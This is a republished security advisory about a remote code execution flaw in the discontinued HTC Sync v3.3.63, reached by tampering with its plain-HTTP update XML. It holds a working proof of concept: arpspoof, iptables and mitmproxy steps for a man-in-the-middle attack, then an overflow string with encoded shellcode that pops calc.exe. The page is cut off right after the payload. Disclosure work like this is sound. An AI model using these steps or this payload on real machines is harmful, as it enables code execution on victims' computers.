{"id":6801,"date":"2017-02-27T14:19:11","date_gmt":"2017-02-27T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/02\/27\/news-592\/"},"modified":"2017-02-27T14:19:11","modified_gmt":"2017-02-27T22:19:11","slug":"news-592","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/02\/27\/news-592\/","title":{"rendered":"SSD Advisory &#8211; HTC Sync Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 27 Feb 2017 10:19:14 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a remote code execution (RCE) found in HTC Sync version v3.3.63.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vulnerability was not reported to the vendor because the product has reached <a href=\"http:\/\/www.htc.com\/us\/software\/htc-sync\/\" target=\"_blank\">end of life<\/a> on 31 August 2016 and was replaced by HTC Sync Manager which is not vulnerable to this vulnerability.<\/p>\n<p><span id=\"more-3026\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>HTC sync contains a remotely exploitable vulnerability within the latest HTC Sync (v3.3.63) software. During startup or if explicitly triggered by the user, HTC Sync checks for latest versions by sending an <em>HTTP<\/em> request to <em>htc.com<\/em> and then parses its reply (XML format). <\/p>\n<p>In particular, the application first requests:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de06298074639950\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/dl2.htc.com\/download\/pcs\/Release1\/HTCSync.xml<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>Which contains a link to the download <em>URI<\/em> which is available in:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de062a1026593233\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/dl2.htc.com\/download\/pcs\/Release1\/HTCSyncRelease.xml<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062a1026593233-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062a1026593233-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/dl2.htc.com\/download\/pcs\/Release1\/HTCSyncRelease.xml<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>By modifying e.g. the &#8220;<em>version<\/em>&#8221; field in the XML document an attacker can inject arbitrary code that gets executed on the victims machine.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An attacker that can place himself man-in-the-middle, either through ARP spoofing or DNS poisoning can intercept traffic and provide an overly long XML parameter which leads to remote code execution on the victims machine. <\/p>\n<p>We used Kali Linux to set up man in the middle attack:<\/p>\n<ol>\n<li>Enable arp spoofing<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de062a5067175836\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> arpspoof -i eth0 -t 192.168.8.90 192.168.8.8 (from victim to mitm)  arpspoof -i eth0 -t 192.168.8.90 192.168.8.1 (from router to victim)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062a5067175836-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062a5067175836-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062a5067175836-1\"><span class=\"crayon-v\">arpspoof<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.8.90<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.8.8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">victim <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mitm<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b4a5de062a5067175836-2\"><span class=\"crayon-v\">arpspoof<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.8.90<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.8.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">router <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<li>Enable IP forwarding<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de062a7032129832\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> echo 1 &gt;&gt; \/proc\/sys\/net\/ipv4\/ip_forwarding<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062a7032129832-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062a7032129832-1\"><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">proc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ipv4<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ip_forwarding<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<li>Add ip tables rule for mitm proxy:<\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de062a9148106541\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> iptables -t nat -A PREROUTING -i eth0 -p tcp &#8211;dport 80 -j REDIRECT &#8211;to-port 8080<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062a9148106541-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062a9148106541-1\"><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PREROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">dport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REDIRECT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<li>Start <em>mitmproxy<\/em><\/li>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de062ac219239172\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> mitmproxy -T &#8211;host<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ac219239172-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58b4a5de062ac219239172-1\"><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">T<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">host<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<li>Intercept and modify traffic by hand<\/li>\n<\/ol>\n<p>The &#8220;<em>version<\/em>&#8221; string for popping up calc.exe is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58b4a5de062ae059867162\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAA\u06eb\u9090\ue124C\ue289\ucdd9\u72d9\u5ff4\u5957\u4949\u4949\u4949\u4949\u4949\u4343\u4343\u4343\u5137\u6a5a\u5841\u3050\u3041\u6b41\u4141\u3251\u4241\u4232\u3042\u4242\u4241\u5058\u4138\u7542\u494a\u4c4b\u7869\u724f\u5045\u7057\u7077\u7031  \u594d\u6558\u7144\u5049\u7431\u4b6c\u3076\u3050\u6b6e\u7242\u4c54\u4b4c\u6243\u5454\u4b4c\u5242\u4866\u6f36\u774c\u7a73\u5637\u5156\u4f4b\u4c6e\u6c55\u3145\u6c61\u6266\u4c46\u7045\u5169\u6f4a\u6d56\u7157\u5739\u6238\u526a\u7242\u3746\u6b6e\u7252\u3052\u4b6c\u4a50  \u6c75\u4b6c\u6c42\u5134\u5862\u6368\u3837\u7177\u316e\u7142\u4b6c\u7962\u3051\u7157\u334e\u4b4c\u7963\u6857\u7369\u5a66\u6962\u6b4e\u5466\u4b4c\u5135\u5638\u3130\u6f59\u4c4e\u316f\u4f78\u6d46\u7147\u674a\u4867\u7059\u3564\u564a\u4344\u6d71\u6839\u6b45\u6d51\u5477\u3544  \u7469\u6863\u6b4e\u3846\u3451\u6166\u4339\u5663\u4b4c\u6c46\u4b30\u6b4e\u6873\u6c77\u6176\u4369\u6b4e\u5435\u4b4c\u6156\u5068\u394b\u7463\u7455\u5477\u6b53\u4b51\u6170\u4931\u5a70\u3156\u6f79\u7079\u6f43\u6f33\u5a50\u4b6c\u3232\u4b6a\u4d4c\u4d71\u6a50\u3153\u4d4c\u554d  \u526e\u7057\u7037\u5045\u3056\u5873\u5146\u6b6e\u4f52\u574d\u6f59\u754a\u4b4f\u7068\u654d\u3259\u6673\u6870\u464e\u554c\u6d6d\u6d6f\u4f6b\u656b\u4c47\u3673\u4c43\u5a55\u506d\u6b49\u7039\u3534\u4534\u4b4f\u5761\u3362\u5242\u4f62\u6a30\u7067\u6343\u6f39\u756a\u4372\u5173  \u6c30\u5343\u6e54\u4542\u5852\u3575\u3053\u4141<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58b4a5de062ae059867162-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58b4a5de062ae059867162-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div 